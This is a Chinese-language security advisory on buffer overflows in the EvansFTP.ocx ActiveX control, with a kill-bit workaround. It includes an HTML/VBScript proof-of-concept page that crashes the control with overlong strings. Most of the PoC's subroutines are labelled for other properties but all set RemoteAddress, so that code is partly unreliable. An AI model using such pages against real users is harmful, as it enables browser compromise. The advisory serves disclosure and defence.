Evans FTP EvansFTP.ocx ActiveX控件多个远程溢出漏洞
发布日期:2008-12-14
更新日期:2008-12-19
受影响系统:Evans Programming Evans FTP
描述:
BUGTRAQ ID:
32814
Evans FTP是以ActiveX FTP控件形式提供的FTP编程解决方案。
EvansFTP.ocx ActiveX控件控件没有正确地验证对RemoteAddress、ProxyPrefix、ProxyName、Password、ProxyBypassList、LoginName和CurrentDirectory属性所传送的参数。如果用户受骗访问了恶意网页并向上述属性传送了超长字符串参数的话,就可以触发缓冲区溢出,导致执行任意指令。
<*来源:Bl@ckbe@rD (
Blackbeard-sql@Hotmail.fr)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<HTML>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:7E864D3E-3E6A-48F0-88AF-CEAEE322F9FD' id='beard' />
<HEAD>
<TITLE>EvansFTP (EvansFTP.ocx) Remote Buffer Overflow PoC</TITLE>
</HEAD>
<BODY>
</pre>
<script language='vbscript'>
Sub RemoteAddress
arg1=String(2068, "A")
beard.RemoteAddress = arg1
End Sub
Sub ProxyPrefix
arg1=String(1044, "A")
beard.RemoteAddress = arg1
End Sub
Sub ProxyName
arg1=String(1044, "A")
beard.RemoteAddress = arg1
End Sub
Sub Password
arg1=String(1044, "A")
beard.RemoteAddress = arg1
End Sub
Sub ProxyBypassList
arg1=String(1044, "A")
beard.RemoteAddress = arg1
End Sub
Sub LoginName
arg1=String(1044, "A")
beard.RemoteAddress = arg1
End Sub
Sub CurrentDirectory
arg1=String(1044, "A")
beard.RemoteAddress = arg1
End Sub
</script><br><br>
<INPUT TYPE="button" VALUE="RemoteAddress PoC" ONCLICK=RemoteAddress()>
<INPUT TYPE="button" VALUE="ProxyPrefix PoC" ONCLICK=ProxyPrefix()>
<INPUT TYPE="button" VALUE="ProxyName PoC" ONCLICK=ProxyName()>
<INPUT TYPE="button" VALUE="Password PoC" ONCLICK=Password()>
<INPUT TYPE="button" VALUE="ProxyBypassList PoC" ONCLICK=ProxyBypassList()>
<INPUT TYPE="button" VALUE="LoginName PoC" ONCLICK=LoginName()>
<INPUT TYPE="button" VALUE="CurrentDirectory PoC" ONCLICK=CurrentDirectory()><br><br>
</BODY>
</HTML>
建议:
临时解决方法:
* 为Clsid {7E864D3E-3E6A-48F0-88AF-CEAEE322F9FD}设置kill-bit。
厂商补丁:
Evans Programming
-----------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.evansprogramming.com/evansftp.asp浏览次数:2711
严重程度:0(网友投票)